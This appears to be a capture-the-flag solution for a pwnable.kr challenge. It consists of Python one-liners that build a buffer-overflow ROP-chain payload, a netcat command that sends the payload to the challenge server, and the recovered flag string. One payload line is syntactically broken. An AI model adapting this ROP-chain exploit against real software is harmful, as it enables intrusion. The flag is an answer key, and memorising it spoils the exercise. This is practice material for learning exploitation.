this mimics the normal behavior.
python -c 'print("1\n"+"Z"*96 + "\xef\xbe\xad\xde" + "\xf9\xff\x09\x08\x0a\x31\x0a\x08\x00\x00\xff\x7f\x38\xca\xff\xffKKKKK\xfe\t\x08\x89\xfe\t\x08j\xfe\t\x08\xa8\xfe\t\x08\xc7\xfe\t\x08\xe6\xfe\t\x08\x05\xff\t\x08\xfc\xff\t\x08".replace("\x0a", "z"))' > answer.bin
python -c 'print("1\n"+"Z"*96 + "\xef\xbe\xad\xde") ;"\xf9\xff\x09\x08\x0a\x31\x0a\x08\x00\x00\xff\x7f\x38\xca\xff\xff\x01\x00\x0a\x08\x00\x00\x00\x00\xe4\xca\xff\xff\xec\xca\xff\xff\xa0\x31\x0a\x08\xb0\x22\xfe\xf7\x50\xca\xff\xff\x00\x00\x00\x00\xd5\x6e\xdc\xf7\x00\x70\xf9\xf7\x00\x70\xf9\xf7\x00\x00\x00\x00K\xfe\t\x08\x89\xfe\t\x08j\xfe\t\x08\xa8\xfe\t\x08\xc7\xfe\t\x08\xe6\xfe\t\x08\x05\xff\t\x08\xfc\xff\t\x08" > answer.bin
-------------------------------------------------------------------------------\

solution:

rop chain to call all ABCDEFG function and theb call the ropme function again.

python -c 'print("1\n"+"Z"*96 + "\xef\xbe\xad\xde" + "\xf9\xff\x09\x08\x0a\x31\x0a\x08\x00\x00\xff\x7f\x38\xca\xff\xffKKKKK\xfe\t\x08\x89\xfe\t\x08j\xfe\t\x08\xa8\xfe\t\x08\xc7\xfe\t\x08\xe6\xfe\t\x08\x05\xff\t\x08\xfc\xff\t\x08".replace("\x0a", "z") )' > answer2.bin


cat answer2.bin - | nc pwnable.kr 9032

add all shown numbers and enter the result:

Magic_spell_1s_4vad4_K3daVr4!